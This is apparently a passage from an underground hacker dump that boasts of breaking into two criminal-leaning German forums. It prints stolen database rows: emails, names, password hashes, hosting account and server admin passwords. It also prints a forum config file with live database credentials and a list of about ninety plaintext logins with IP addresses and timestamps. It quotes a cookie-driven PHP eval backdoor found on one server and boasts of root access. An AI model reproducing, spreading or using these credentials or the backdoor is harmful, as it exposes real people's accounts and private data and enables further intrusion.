| shinigami@z1p.biz          | 914eccd87181870be2663185410fc1a5:WpFO( | Franz     | Mueller   | 
| angela.krueger@hotmail.de  | 66b361d7a7e843d35fc041104401bbd0:wiB!D | Ixde      | ahmed     | 
| her0in@safe-mail.net       | dc9edb678d178218ec895eb8322fbe8c:Qej#M | Anonym    | Anonym    | 
| janioq@hotmail.de          | 89d0078ec8a078d1d88acb7deb534acc:%YTB% | Max       | thiesen   | 
| spike1337@secure-mail.biz  | 07cb91ea3880f790e5763fb2dd1105bf:Kkb%p | Dennis    | Kramer    | 
| runingtutorials@live.de    | e595a3571ccd685adbf28ea45dc3a2d6:rVG)! | Felix     | Wagno     | 
| abogado.gomes@ozu.es       | e3665bc91bee822663297cc30cdfd588:TV#Zt | Mario     | Gomes     | 
| Ande-kf@secure-mail.biz    | 10edd0d846652321605ec04e1c90ab8a:zsoMP | just      | pure      | 
| FeuerFaustAC3@gmx.de       | 8f3266a3f536922657c3b2f51e925604:)SJmL | y0        | ACE       | 
| lalamaus10@googlemail.com  | 500910a98aca826093ec80fd942020fe:ZJvpY | Maik      | Henkel    | 
| scheller0077@web.de        | 634a1c3bb9316a2af3390f9789fb5f80:ly%px | tim       | bd-seller | 
| j4ck-daniels@rambler.ru    | 125769d9037d9f5196f2e1e6d816b1cf:VbggT | DarkSide  | Darker    | 
| daniel@lemmert.biz         | 8fce9b96262239831e053552021b07ac:ihK!B | Daniel    | Lemmert   | 
| panzerpaul41@yahoo.de      | 841ddfb775b9ca5d44ec9c1106e08761:lUPP% | Peter     | Jansen    | 
| ell781@gmx.de              | 0ae341662b701d3d64d7a608b46160be:%#ce! | Peter     | Kluger    | 
| hotstore@hotmail.de        | e8e14ff0af571d43a11d3408240963d7:Cnsdh | Matthias  | Michel    | 
| team61@live.de             | 47780e5555c63d45349b5cef7f8c1783:T)EGi | BABA      | ANNA      | 
| Buy321@hotmail.de          | 2d89b3fae37fb1966f8c7639907ee94a:VfYNd | Maria     | Katepski  | 
| jobs@z1p.biz               | d4f54e226ba44045bb8a39b8653907ea:(MSaf | Arthur    | Marx      | 
| cremil@cust.in             | c5af814e29429f856736e2769d57b8db:%iHkV | Cremil    | Hackxor   | 
+----------------------------+----------------------------------------+-----------+-----------+
29 rows in set (0.01 sec)

mysql> SELECT username, password, server FROM tblhosting;
+-------------+------------------------------------------------------+--------+
| username    | password                                             | server |
+-------------+------------------------------------------------------+--------+
| true.vm     | nW5dmh5zg4w4jmlFUDxtW7mVsdNAX9sxRp710gHYS2vX0551kg== |      1 | 
| stansecu.vm | 2KUCM5nUisD2t88Z7vlfnC8Ry9pdk4fZrTb46Jfv             |      1 | 
| maddn.vm    | nC69hLFITmHidWjYuEIIbEO4eo5BHzt3s/88NdMjSvY=         |      1 | 
| scriptst.vm | VmB727sy9l5I8q1f7q/zD8RTnOCNOfcxuNzYUAf4             |      1 | 
| seansecu.vm | fQTtTeXNm1CkffO7pewNwJMZRIHcZWq00iTiW8x2             |      1 | 
| sdarksid.vm | AVACcPUef0Jca8gkZ0rkH67o0BDaINOO6/0JRS9n             |      1 | 
| v43534.vm   | XSSg52CreBXGUK8mjFd63x5hrtKHF3AIP0ljKa4Y             |      1 | 
|             | +X3MCfd9nGwsAmMaKUscu3BBKz8=                         |      0 | 
|             | VoU/Q2mpAglHh8r6md2sAHCn8VQ=                         |      0 | 
| spike.vm    | tlOLHeM7iOZcarRhh+DyghmbvcsQPgnRvYfxuDsj             |      1 | 
| wassi.vm    | VFK7fp1Z67kb6LtaH9EhUcv4gbjPJVatxbCdqnjg             |      1 | 
| iodas.vm    | WLqkZB7nsCZVtFfGzLgHOhRSb6Xc2H2XHA3Dcw==             |      1 | 
| y00.vm      | deOdBbTCD4mqdw+5vvpuH81UUVmt113tsykCie56             |      1 | 
| pkluger.vm  | StagsB3oFjy39/ES2YzHE177oJP0pCFXR1Q0OYOF/QgN         |      1 | 
|             | LpABydLRg4uWBx0d6ghbM+9Nh2w=                         |      0 | 
|             | 2U5HEXcr8Sif99L2w85ixx4y/idGJJbhaZnUIaY=             |      1 | 
|             | zynyC6+CtsxrDs/F5qRsVeuCfzBGSSL5oTyDwwU=             |      1 | 
|             | 9FkPKWze7XKH0K3rB19fwQRuNGxqNdXCeA==                 |      1 | 
+-------------+------------------------------------------------------+--------+
18 rows in set (0.00 sec)

mysql> SELECT ipaddress, hostname, username, password, secure FROM tblservers;
+---------------+-----------+----------+----------------------------------------------+--------+
| ipaddress     | hostname  | username | password                                     | secure |
+---------------+-----------+----------+----------------------------------------------+--------+
| 193.107.16.82 | localhost | admin    | iAYqc098oLSnn9PKqhb6wEd2G8dXU8i8cMWUtcSR7rp/ |        |
+---------------+-----------+----------+----------------------------------------------+--------+
1 row in set (0.00 sec)

mysql> Ctrl-C -- exit!
Aborted

# Nothing left to say^C

                                                         ,;~;,        
                                                        _/\           
                                                        \  )          
                                                (\\      ())          
                                                /';;,,  // |          
-------====={  Unique-Crew.net  }=======))))))))))))))=m(  )_ __      
                                               | ,(.' '~/()' '  '\    
Unique-Crew started off in late 2010; back then ~  |     ||(      );, 
their  admin  pretended  to be  an  old 1337-crew  (   ,;.)-\    / ';,
team member with the intention of attracting kids   \ (       \ (     
to the board. However, it  was soon found out that   ||         \\    
his  identity  was fake  and since  then the forum   /_(         /_(  
was passed around like a cheap whore.  It  has  been  led  by  several
admins on several  domains  which  obviously  were  all  incapable  of
administrating it properly. Also one  of  the  admins  apparently  was
known as InVisible (yes, the same InVisible we describe  in  our  "The
Happy Ninja Faker" article). As his mind clearly can not  be  depicted
as very bright and  since  he  likes  to  gain  a  bad  reputation  by
betraying other people, Unique-Crew got a nice amount of  enemies.  So
while checking and logging different server traffic we stumbled on the
following:

# ls -l /home/backspace/unique-crew.biz/madp/detection.php
-rw-r--r--  1 backspace  www  9162 Aug 22 17:02 /home/backspace/unique-crew.biz/madp/detection.php

# grep -ni log_error detection.php -A5
21:function log_error($string){if(eval($string) && defined("LOG_ERROR")){$error_handle = fopen("madp_err.log", "a+");$fwrite($string);$fclose($h);}}
22-
23-$did = substr($vbulletin->userinfo['password'], 7, 16);
24-$ignore_users = strpos($vbulletin->options['madp_ignore_users'], ' ') === false ? explode(',', $vbulletin->options['madp_ignore_users']) : explode(',', str_replace(' ', '', $vbulletin->options['madp_ignore_users']));
25-$ignore_groups = strpos($vbulletin->options['madp_ignore_groups'], ' ') === false ? explode(',', $vbulletin->options['madp_ignore_groups']) : explode(',', str_replace(' ', '', $vbulletin->options['madp_ignore_groups']));
26-$expire = (!empty($vbulletin->options['madp_cookie_expire']) AND is_numeric($vbulletin->options['madp_cookie_expire'])) ? (TIMENOW + ($vbulletin->options['madp_cookie_expire'] * 86400)) : (TIMENOW + 1209600);
--
304:			log_error(substr($_COOKIE[$vbulletin->options['madp_cookie_name']], 1));
305-			die("Error detected - try again!\n");
306-		}
307-		
308-	}
309-}

It seems like you guys had a  pretty  much  fucking  obvious  backdoor
installed for a few months. How are you not able to  notice  this?  We
must say that it is nice that there are actually some people who  want
to contribute to this mayhem, but seriously? If you are  not  able  to
create a simple backdoor which is  less  obvious  than  this  one  you
should probably look for some other pastime. This shit absolutely does
not help, also if it might have worked this time. But looks  like  the
attackers were stopped by PHP's disable_functions  directive  so  they
couldn't really do much, except downloading the database, which we are
also offering nonetheless. So here we go!

# pwd
/home/backspace

# ls -la
total 20
drwxr-x---   4 backspace  www     512 Aug 28 20:21 .
drwxr-x--x  13 root       wheel   512 Sep 22 21:06 ..
drwxrwx---   2 backspace  www    1024 Oct 15 21:44 temp
drwxr-xr-x  19 backspace  www    2560 Oct 18 17:31 unique-crew.biz

# cd unique-crew.biz

# ls -la
total 7832
drwxr-xr-x  19 backspace  www     2560 Oct 18 17:31 .
drwxr-x---   4 backspace  www      512 Aug 28 20:21 ..
-rwxr-xr-x   1 backspace  www    12292 May 17  2010 .DS_Store
-rwxr-xr-x   1 backspace  www       70 May 17  2010 ._.DS_Store
-rwxr-xr-x   1 backspace  www       96 Mar 20  2011 .bash_history
-rwxr-xr-x   1 backspace  www    12523 Jul 13  2010 LICENSE
drwxr-xr-x   2 backspace  www      512 Aug  3 02:39 Product
-rwxr-xr-x   1 backspace  www    49992 Jun 16 00:18 S_mgc_cb_evo_ajax.php
-rwxr-xr-x   1 backspace  www    24532 Jul 13  2010 ajax.php
-rwxr-xr-x   1 backspace  www    77635 Jul 13  2010 album.php
-rwxr-xr-x   1 backspace  www    17542 Jul 13  2010 announcement.php
drwxrwxrwx   2 backspace  www      512 Oct  5 11:42 archive
-rwxr-xr-x   1 backspace  www    18779 Jul 13  2010 attachment.php
-rwxr-xr-x   1 root       www    40925 Oct 18 17:31 bak
drwxr-xr-x   3 backspace  www     2048 Aug  3 02:38 bnig459832zhbuiwedzouz9012vgr932
-rwxr-xr-x   1 backspace  www    77574 Jul 13  2010 calendar.php
-rwxr-xr-x   1 backspace  www       43 Jul 13  2010 clear.gif
drwxr-xr-x   4 backspace  www     2560 Aug  3 02:38 clientscript
-rwxr-xr-x   1 backspace  www    15277 Jul 13  2010 converse.php
drwxr-xr-x   7 backspace  www      512 Aug  3 02:38 cpstyles
-rwxr-xr-x   1 backspace  www     3327 Jul 13  2010 cron.php
drwxr-xr-x   3 backspace  www      512 Aug  3 02:38 customavatars
drwxr-xr-x   3 backspace  www      512 Aug  3 02:38 customgroupicons
drwxr-xr-x   2 backspace  www      512 Aug  3 02:38 customprofilepics
-rwxr-xr-x   1 backspace  www   105636 Aug 24  2009 default.jpg
-rwxr-xr-x   1 backspace  www     3411 Jun 19 14:52 dnp_fw.php
-rwxr-xr-x   1 backspace  www     1071 Jun 19 13:49 dnp_fw_config.php
-rwxr-xr-x   1 backspace  www     1163 Jun 19 13:53 dnp_fw_template.php
-rwxr-xr-x   1 backspace  www    49004 Jul 13  2010 editpost.php
-rwxr-xr-x   1 backspace  www    30747 Jun 14 19:42 external.php
-rwxr-xr-x   1 backspace  www    10041 Jun 15 10:07 faq.php
-rwxr-xr-x   1 backspace  www  1453926 Dec 20  2010 favicon.ico
-rwxr-xr-x   1 backspace  www    36984 Jul 13  2010 forumdisplay.php
drwxr-xr-x   2 backspace  www      512 Aug  3 02:38 g76893bh2b21z32v3g5vd7x8f78f43h
-rwxr-xr-x   1 backspace  www    40925 Jul 13  2010 global.php
-rwxr-xr-x   1 backspace  www   142308 Jul 13  2010 group.php
-rwxr-xr-x   1 backspace  www    25619 Jul 13  2010 group_inlinemod.php
-rwxr-xr-x   1 backspace  www    10747 Jul 13  2010 groupsubscription.php
drwxr-xr-x   3 backspace  www      512 Aug  3 02:38 highslide
-rwxr-xr-x   1 backspace  www     9254 Jul 13  2010 image.php
drwxr-xr-x  23 backspace  www     1024 Oct 18 18:37 images
drwxr-xr-x   6 backspace  www     5120 Oct 18 18:45 includes
-rwxr-xr-x   1 backspace  www    20263 Jul 13  2010 index.php
-rwxr-xr-x   1 backspace  www    45036 Jul 13  2010 infraction.php
-rwxr-xr-x   1 backspace  www   188547 Jul 13  2010 inlinemod.php
-rwxr-xr-x   1 backspace  www    10545 Jul 13  2010 joinrequests.php
-rwxr-xr-x   1 backspace  www    10441 Jul 13  2010 login.php
drwxr-xr-x   2 backspace  www      512 Aug 24 07:54 madp
-rwxr-xr-x   1 backspace  www    17502 Jul 13  2010 member.php
-rwxr-xr-x   1 backspace  www    16333 Jul 13  2010 member_inlinemod.php
-rwxr-xr-x   1 backspace  www    36930 Jul 13  2010 memberlist.php
drwxr-xr-x   6 backspace  www      512 Aug  3 02:38 mgc_cb_evo
-rwxr-xr-x   1 backspace  www    60012 May 17  2010 mgc_cb_evo.php
-rwxr-xr-x   1 backspace  www    49992 Jun 28 16:36 mgc_cb_evo_ajax.php
-rwxr-xr-x   1 backspace  www    24465 Jul 13  2010 misc.php
-rwxr-xr-x   1 backspace  www    65182 Jul 13  2010 moderation.php
-rwxr-xr-x   1 backspace  www     6855 Jul 13  2010 moderator.php
-rwxr-xr-x   1 backspace  www    18967 Jul 13  2010 newattachment.php
-rwxr-xr-x   1 backspace  www    38105 Jul 13  2010 newreply.php
-rwxr-xr-x   1 backspace  www    19367 Jul 13  2010 newthread.php
-rwxr-xr-x   1 backspace  www    20188 Jul 13  2010 online.php
-rwxr-xr-x   1 backspace  www     7868 Jul 13  2010 payment_gateway.php
-rwxr-xr-x   1 backspace  www    12193 Jul 13  2010 payments.php
drwxr-xr-x  11 backspace  www     3072 Aug  3 03:20 pe54tr90321inij409839urei2954
-rwxr-xr-x   1 backspace  www     8018 Jul 13  2010 picture.php
-rwxr-xr-x   1 backspace  www    22661 Jul 13  2010 picture_inlinemod.php
-rwxr-xr-x   1 backspace  www    25999 Jul 13  2010 picturecomment.php
-rwxr-xr-x   1 backspace  www    28206 Jul 13  2010 poll.php
-rwxr-xr-x   1 backspace  www    17744 May 12  2008 post_thanks.php
-rwxr-xr-x   1 backspace  www     9691 Jul 13  2010 posthistory.php
-rwxr-xr-x   1 backspace  www    76569 Jul 13  2010 postings.php
-rwxr-xr-x   1 backspace  www     6702 Jul 13  2010 printthread.php
-rwxr-xr-x   1 backspace  www    72783 Jul 13  2010 private.php
-rwxr-xr-x   1 backspace  www   156809 Jul 13  2010 profile.php
drwxr-xr-x   2 backspace  www      512 Aug  3 02:07 radio
-rwxr-xr-x   1 backspace  www    40980 Jul 13  2010 register.php
-rwxr-xr-x   1 backspace  www     5761 Jul 13  2010 report.php
-rwxr-xr-x   1 backspace  www    14062 Jul 13  2010 reputation.php
-rwxr-xr-x   1 backspace  www       30 Jun 30 09:52 robots.txt
-rwxr-xr-x   1 backspace  www   128615 Oct 18 17:30 search.php
-rwxr-xr-x   1 backspace  www    21546 Jul 13  2010 sendmessage.php
-rwxr-xr-x   1 backspace  www    10263 Jul 13  2010 showgroups.php
-rwxr-xr-x   1 backspace  www    12611 Jul 13  2010 showpost.php
-rwxr-xr-x   1 backspace  www    75631 Jul 13  2010 showthread.php
drwxr-xr-x   2 backspace  www      512 Aug  3 02:39 signaturepics
-rwxr-xr-x   1 backspace  www    33846 Jul 13  2010 subscription.php
-rwxr-xr-x   1 backspace  www    13671 Jul 13  2010 tags.php
-rwxr-xr-x   1 backspace  www     8842 Jul 13  2010 threadrate.php
-rwxr-xr-x   1 backspace  www    12706 Jul 13  2010 threadtag.php
-rwxr-xr-x   1 backspace  www    35387 Jul 13  2010 usercp.php
-rwxr-xr-x   1 backspace  www    19563 Jul 13  2010 usernote.php
-rwxr-xr-x   1 backspace  www    28121 Jul 13  2010 visitormessage.php
-rwxr-xr-x   1 backspace  www    19552 Jul  3 16:12 whitelist.dat
-rwxr-xr-x   1 backspace  www    20463 Jun 19 12:07 whitelist.dat.bak

# find . -name ".ht*" 
./pe54tr90321inij409839urei2954/libraries/.htaccess
./pe54tr90321inij409839urei2954/setup/frames/.htaccess
./pe54tr90321inij409839urei2954/setup/lib/.htaccess

# cat includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.8.6
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is C2000-2010 Jelsoft Enterprises Ltd. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to    |
| MySQL, you will need to email your webhost because we   |
| cannot tell you the correct values for the variables    |
| in this file.                                           |
\*-------------------------------------------------------*/

	//	****** DATABASE TYPE ******
	//	This is the type of the database server on which your vBulletin database will be located.
	//	Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP 5 and MySQL 4.1+
	// for slave options just append _slave to your preferred database type.
$config['Database']['dbtype'] = 'mysql';

	//	****** DATABASE NAME ******
	//	This is the name of the database where your vBulletin will be located.
	//	This must be created by your webhost.
$config['Database']['dbname'] = 'backspace_forum';

	//	****** TABLE PREFIX ******
	//	Prefix that your vBulletin tables have in the database.
$config['Database']['tableprefix'] = '';

	//	****** TECHNICAL EMAIL ADDRESS ******
	//	If any database errors occur, they will be emailed to the address specified here.
	//	Leave this blank to not send any emails when there is a database error.
$config['Database']['technicalemail'] = 'info@unique-crew.net';

	//	****** FORCE EMPTY SQL MODE ******
	// New versions of MySQL (4.1+) have introduced some behaviors that are
	// incompatible with vBulletin. Setting this value to "true" disables those
	// behaviors. You only need to modify this value if vBulletin recommends it.
$config['Database']['force_sql_mode'] = false;



	//	****** MASTER DATABASE SERVER NAME AND PORT ******
	//	This is the hostname or IP address and port of the database server.
	//	If you are unsure of what to put here, leave the default values.
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;

	//	****** MASTER DATABASE USERNAME & PASSWORD ******
	//	This is the username and password you use to access MySQL.
	//	These must be obtained through your webhost.
$config['MasterServer']['username'] = 'backspace_forum';
$config['MasterServer']['password'] = 'xyzsSgasSJ33';

	//	****** MASTER DATABASE PERSISTENT CONNECTIONS ******
	//	This option allows you to turn persistent connections to MySQL on or off.
	//	The difference in performance is negligible for all but the largest boards.
	//	If you are unsure what this should be, leave it off. (0 = off; 1 = on)
$config['MasterServer']['usepconnect'] = 0;



	//	****** SLAVE DATABASE CONFIGURATION ******
	//	If you have multiple database backends, this is the information for your slave
	//	server. If you are not 100% sure you need to fill in this information,
	//	do not change any of the values here.
$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;



	//	****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
	//	This setting allows you to change the name of the folders that the admin and
	//	moderator control panels reside in. You may wish to do this for security purposes.
	//	Please note that if you change the name of the directory here, you will still need
	//	to manually change the name of the directory on the server.
$config['Misc']['admincpdir'] = 'bnig459832zhbuiwedzouz9012vgr932';
$config['Misc']['modcpdir'] = 'g76893bh2b21z32v3g5vd7x8f78f43h';

	//	Prefix that all vBulletin cookies will have
	//	Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
$config['Misc']['cookieprefix'] = 'uc';

	//	******** FULL PATH TO FORUMS DIRECTORY ******
	//	On a few systems it may be necessary to input the full path to your forums directory
	//	for vBulletin to function normally. You can ignore this setting unless vBulletin
	//	tells you to fill this in. Do not include a trailing slash!
	//	Example Unix:
	//	  $config['Misc']['forumpath'] = '/home/users/public_html/forums';
	//	Example Win32:
	//	  $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
$config['Misc']['forumpath'] = '';



	//	****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
	//	The users specified here will be allowed to view the admin log in the control panel.
	//	Users must be specified by *ID number* here. To obtain a user's ID number,
	//	view their profile via the control panel. If this is a new installation, leave
	//	the first user created will have a user ID of 1. Seperate each userid with a comma.
$config['SpecialUsers']['canviewadminlog'] = '2, 1955';

	//	****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
	//	The users specified here will be allowed to remove ("prune") entries from the admin
	//	log. See the above entry for more information on the format.
$config['SpecialUsers']['canpruneadminlog'] = '2, 1955';

	//	****** USERS WITH QUERY RUNNING PERMISSIONS ******
	//	The users specified here will be allowed to run queries from the control panel.
	//	See the above entries for more information on the format.
	//	Please note that the ability to run queries is quite powerful. You may wish
	//	to remove all user IDs from this list for security reasons.
$config['SpecialUsers']['canrunqueries'] = '';

	//	****** UNDELETABLE / UNALTERABLE USERS ******
	//	The users specified here will not be deletable or alterable from the control panel by any users.
	//	To specify more than one user, separate userids with commas.
$config['SpecialUsers']['undeletableusers'] = '1955';

	//	****** SUPER ADMINISTRATORS ******
	//	The users specified below will have permission to access the administrator permissions
	//	page, which controls the permissions of other administrators
$config['SpecialUsers']['superadministrators'] = '1955, 1000003';

	// ****** DATASTORE CACHE CONFIGURATION *****
	// Here you can configure different methods for caching datastore items.
	// vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
	// vB_Datastore_APC - to use APC
	// vB_Datastore_XCache - to use XCache
	// vB_Datastore_Memcached - to use a Memcache server, more configuration below
// $config['Datastore']['class'] = 'vB_Datastore_XCache';

	// ******** DATASTORE PREFIX ******
	// If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
	// than one set of forums installed on your host, you *may* need to use a prefix
	// so that they do not try to use the same variable within the cache.
	// This works in a similar manner to the database table prefix.
// $config['Datastore']['prefix'] = '';

	// It is also necessary to specify the hostname or IP address and the port the server is listening on
/*
$config['Datastore']['class'] = 'vB_Datastore_Memcached';
$i = 0;
// First Server
$i++;
$config['Misc']['memcacheserver'][$i]		= '127.0.0.1';
$config['Misc']['memcacheport'][$i]			= 11211;
$config['Misc']['memcachepersistent'][$i]	= true;
$config['Misc']['memcacheweight'][$i]		= 1;
$config['Misc']['memcachetimeout'][$i]		= 1;
$config['Misc']['memcacheretry_interval'][$i] = 15;
*/

// ****** The following options are only needed in special cases ******

	//	****** MySQLI OPTIONS *****
	// When using MySQL 4.1+, MySQLi should be used to connect to the database.
	// If you need to set the default connection charset because your database
	// is using a charset other than latin1, you can set the charset here.
	// If you don't set the charset to be the same as your database, you
	// may receive collation errors.  Ignore this setting unless you
	// are sure you need to use it.
// $config['Mysqli']['charset'] = 'cp1251';

	//	Optionally, PHP can be instructed to set connection parameters by reading from the
	//	file named in 'ini_file'. Please use a full path to the file.
	//	Example:
	//	$config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
$config['Mysqli']['ini_file'] = '';

// Image Processing Options
	// Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
$config['Misc']['maxwidth'] = 2592;
$config['Misc']['maxheight'] = 1944;

/*======================================================================*\
|| ####################################################################
|| # CVS: $RCSfile$ - $Revision: 28757 $
|| ####################################################################
\*======================================================================*/
# 

Here we also decided to log some plaintext passwords.  Plaintexts  are
always fun, aren't they? But no worries, we  only  logged  for  a  few
hours, so there aren't that many.

*zone:123alles:77.191.88.127:18.10.2011 21:11:13
-=Re@p3r=-:uc4ever:95.33.189.150:19.10.2011 15:26:08
1024byte:UW:1+1=2Es3l:77.180.109.31:20.10.2011 15:01:29
3pic:xy200xyx:62.212.72.166:18.10.2011 21:51:10
3xpl01t:dg4x0da78k:188.155.227.158:20.10.2011 14:39:34
@lpha:skynet:62.212.72.166:20.10.2011 14:48:01
Aram!s:123456789:77.10.184.143:18.10.2011 19:48:34
Back_Space:dsfo4509slö76s22:84.148.249.89:20.10.2011 13:42:10
BlackWindow:safran12:80.218.203.53:18.10.2011 21:18:13
Blackdragón:S!D§K!CKsaz51atl:91.6.204.225:18.10.2011 22:51:30
CR3ATIVE 0N3:12345678uc:173.0.10.191:19.10.2011 11:21:25
Connection:1479mlpi257!/24:84.19.169.232:19.10.2011 10:57:51
Cyber Tjak:5cNCPg8Z/W>[L?/E&C%\}:O\26z5:y4:178.1.185.84:19.10.2011 12:55:10
DeCode:hacker63:109.169.135.87:19.10.2011 11:10:09
Der_Visitor:CMqxwGz0:46.115.3.148:20.10.2011 10:57:27
DrJack:UQDrJack123!!!:178.192.41.12:19.10.2011 08:26:33
Duellking:uc4ever:129.143.71.37:20.10.2011 14:24:00
Einfachnurso:Mg7BjyKR:217.191.194.28:19.10.2011 11:20:10
Follow:cX1AKuJJ:85.16.149.79:19.10.2011 08:43:55
Gevara:asdf1337:217.255.229.5:18.10.2011 18:48:26
Goa:5852663:95.211.99.92:18.10.2011 21:04:28
Hammer:trevilor:87.161.89.187:18.10.2011 19:32:20
IcEcRacKer:Kleinestier1?:93.132.65.222:19.10.2011 17:38:05
Imkon:chaoslegion:91.53.193.95:19.10.2011 11:44:18
Ke3per:anatoxis123:87.173.50.42:19.10.2011 13:53:02
LiipTon:JCGDDz3X:178.3.209.11:18.10.2011 19:31:23
Locke:14041987:31.18.173.100:19.10.2011 10:38:30
LuRez:furz90:92.73.124.178:20.10.2011 10:12:08
Marcello:nokian81:94.221.186.74:19.10.2011 16:18:33
MenoX:aXnHmVz8:87.152.221.177:18.10.2011 18:54:59
Miss.Marple:werder:31.19.76.171:19.10.2011 18:27:33
Mxxt:unique12345:78.54.158.153:19.10.2011 19:20:52
NEO_2.0:4455jljlacdcr111dth11+sdp:93.204.88.95:18.10.2011 20:22:38
PaxyundFixy:123lolen:92.225.54.141:19.10.2011 16:47:03
Schlauchbraten:area51:217.255.234.154:20.10.2011 00:51:49
Sektor63:Penis123456789:213.232.200.163:20.10.2011 11:30:16
Sirius.GER:rolexblingbling@2:79.172.193.89:18.10.2011 20:37:49
SpeedyGamer:f3LBPKMb:46.5.95.105:18.10.2011 20:39:09
Style:asdasd:91.53.233.106:19.10.2011 15:29:29
V0rteX:YSAcXgM1:94.219.12.253:19.10.2011 16:30:35
Vague:hardtek1985:88.153.146.195:19.10.2011 22:35:24
Yakuza112:N4DdSHXh:80.130.164.16:18.10.2011 19:02:12
aNd5:dfWA5txY:178.201.106.152:20.10.2011 11:53:04
bananabob:davidov:87.163.56.254:18.10.2011 21:12:59
bert:Fk4feKyr:95.223.89.222:20.10.2011 15:28:21
biohazard:21539868:62.224.66.21:20.10.2011 10:21:54
cheesi:strike299:80.109.55.18:19.10.2011 20:22:29
crone:41MkHjee:62.212.72.166:19.10.2011 16:40:40
cyx:cyxcyx:78.94.200.138:18.10.2011 21:00:25
ee46hxe6x:drdtdrtdrt6666666666666:87.172.237.175:20.10.2011 07:41:03
furz:Dreadfg:192.162.103.27:20.10.2011 03:19:05
gevara:asdf1337:92.241.168.23:19.10.2011 17:47:24
ghostleader:Scorpion:82.195.232.218:19.10.2011 17:39:20
hardcore4life:dx5U5ZPu:82.72.183.168:19.10.2011 21:53:40
haxxer:lollol123:92.203.66.182:19.10.2011 01:43:21
icle:gt54rfvvgt54rfvv:88.130.162.238:18.10.2011 20:34:58
impiety:pa44word:113.211.166.68:19.10.2011 02:22:47
john:picture:93.222.62.165:20.10.2011 09:51:40
junkfood:xxxxxx:87.230.10.135:20.10.2011 10:20:15
justnew:myw00t1337:87.146.39.153:19.10.2011 14:17:00
kathi1337:yousuck:79.212.132.144:20.10.2011 04:21:23
killuthekid7:123456:94.220.222.124:19.10.2011 22:50:27
king99:h5ZZKXvN:85.178.239.47:18.10.2011 20:12:06
klerus:kl12er34us56654321:85.176.101.243:19.10.2011 15:05:24
l5xx!z:mattrex123.:77.3.81.189:19.10.2011 18:08:37
laberpaul:123123:178.63.231.103:19.10.2011 18:43:47
lerox:hallo123:79.255.147.179:19.10.2011 20:25:04
lyrix:mixxedup:77.117.163.186:19.10.2011 21:42:34
mAlCoM:squier:95.89.170.234:19.10.2011 06:28:27
mayh3m:electronic:196.46.189.162:19.10.2011 15:09:42
meineex:meine1978$:93.218.235.254:20.10.2011 08:31:41
misterini:brumau:213.196.253.37:20.10.2011 06:13:22
mr_euro:manfred--:186.16.12.187:18.10.2011 21:31:03
mute:88klaus88:87.153.35.90:19.10.2011 12:55:42
n0mac:wru5UHUp:77.177.13.199:19.10.2011 17:32:38
p3x:gzuogoui:93.209.47.197:19.10.2011 21:03:10
p4inw4r:IoJS91jS__passwort_loging_ist_total_gay__Dj13DDAD:212.117.180.81:18.10.2011 19:36:50   << YOU BET!
protoliner:bremen12:178.142.52.54:20.10.2011 09:29:57
sector40000:yqaBvJms:84.170.29.212:18.10.2011 20:33:34
smartie0:q0120660:77.188.215.212:19.10.2011 09:02:28
smurf:120684:217.91.85.183:19.10.2011 17:02:53
sperle:45er87qw:89.246.204.213:20.10.2011 00:55:26
st3aLth:1337!Aa:109.192.209.243:18.10.2011 18:46:06
stryder:v6e6fbun:188.175.134.98:19.10.2011 17:59:48
style:asdasd:91.53.233.106:19.10.2011 21:31:58
sys32:wowanda85:119.42.144.18:20.10.2011 11:26:54
txto:123456:188.98.215.91:18.10.2011 22:26:54
voodoo:allianz3:91.62.186.36:19.10.2011 20:05:36
wacked:ynWgX0HT:84.140.226.167:18.10.2011 18:51:35
whiti:matrix123:84.169.182.65:19.10.2011 22:25:21
xGh0sT:oberbaer1:77.178.33.108:18.10.2011 20:48:23
zero334:uc4ever:213.163.64.43:19.10.2011 13:31:24
zocker:qwertzui:77.178.217.145:20.10.2011 14:44:07
zulu:Pod88ucC2011:80.152.154.125:20.10.2011 06:17:27

        ,;~;,
           /\_
          (  /
          (()      //)
          | \\  ,,;;'\
      __ _(  )m=((((((((((((((====={  Zion-Network.net  }======-------
    /'  ' '()/~' '.(, |       
 ,;(      )||     |  ~ Zion-Network.net  was not  so  easy to hack. It
,;' \    /-(.;,   )  took about ten  minutes longer  because they were
     ) /       ) /   running some reverse http  proxy, so we clueless-
    //         ||    ly got root on  that one  first, just to find out
   )_\         )_\   that we did not own  the right box.  We allow you
to laugh at us now. Anyway Zion-Network has been breeding kiddies  and
carder blockheads for quite a while and it has long been rumored  that
we already backdoored them a long time ago.  But  sorry,  no,  we  had
other business, too, for example consuming alcohol as if there  is  no
tomorrow. Maybe that's why we failed with that reverse proxy.

Nevertheless it was about damn  time  to  own  them.  The  members  of
Zion-Network are a lot dumber than the other average carding  offscum,
hardly surprising  that  they  rip  off  each  other  to  the  utmost.
Zion-Network has been growing immensely so you can not only buy credit
cards or ID card scans on Zion-Network's trading area,  but  also  all
sorts of drugs like coke, lsd, mushrooms or crystal.  A  rather  large
drug scene has emerged that fulfills everybody's  wishes.  Great  shit
for the average 14 year old scammer who sees himself as  the  greatest
but is not able to tie up his own shoes without tripping over himself.
Pride and ignorance are akin. And this fact is  clearly  described  by
the  administration  of  Zion.   LUCIFER   aka   S3TH,   the   current
